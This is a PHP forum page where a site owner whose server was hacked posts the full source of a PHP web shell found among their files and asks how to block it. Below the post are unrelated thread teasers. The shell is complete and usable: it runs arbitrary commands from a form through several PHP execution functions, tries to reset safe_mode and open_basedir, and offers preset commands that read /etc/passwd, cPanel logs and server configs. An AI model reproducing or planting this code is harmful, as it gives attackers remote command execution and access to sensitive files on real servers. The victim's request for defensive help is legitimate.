I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
Not "Just Another" MMORPG - text based.
Hello,I've been learning MySQL and PHP for the last 2-3 years.Though, I've had long pauses and months without touching PHP.Now, I started at a new school this autumn, and I found that some of my old
need help to creat database
Hello Team, please guys i am stuck from three days with paypal issue for IPN but no luck yet now i wants to do other method. i have used this form to send info to paypal and everything is working ok
Count Session and Trigger Events
I am New in PHP, seeking a method to count logged users by counting the sessions or any …, is there any way to do it without using a database, and also eager to know a method to make to throw an
PHP and Javascript
Hi Guys,Im trying to load the contents of an html file into a text area for editing, this is the code I have so far but it doesnt seem to be working. I think it's because some of the $line have
Filtering Tables
Hello Thanks for any help any one can give Im very new to PHP..I need to pull data for clients that share 2 diff services into one table.mysql_select_db($database_pull, $pull);$query_Recordset1 =
Database 'Validation'
Hi everyone,I'm trying to validate the password entered by the user with the password in the database. I've worked out that it checks the username fine (if the username doesn't exist it displays an
Unifying logins of two different scripts
I have two different game scripts which I want to embed on my own site. The problem is I don't want users to create 3 different accounts - one for main site and 2 other for games. I want them to just
Running External Scripts
I am very new to PHP and am not even sure what I'm asking is possible. I have just installed mediaWiki on my site and I'm trying to install some extensions. In order to install the Search
Output Buffering question
Hi all, I've been trying to wrap my head around output buffering. So far I've found tons of benifits but I'm wondering about the downside of output buffering. Problems it creates, whether or not it
check comment for html
hi, I just wanted to check if a comment a user posts contains HTML, and if it does, to not allow it to be posted.this is my current php, any help would be very much appreciated! thanks.Code:
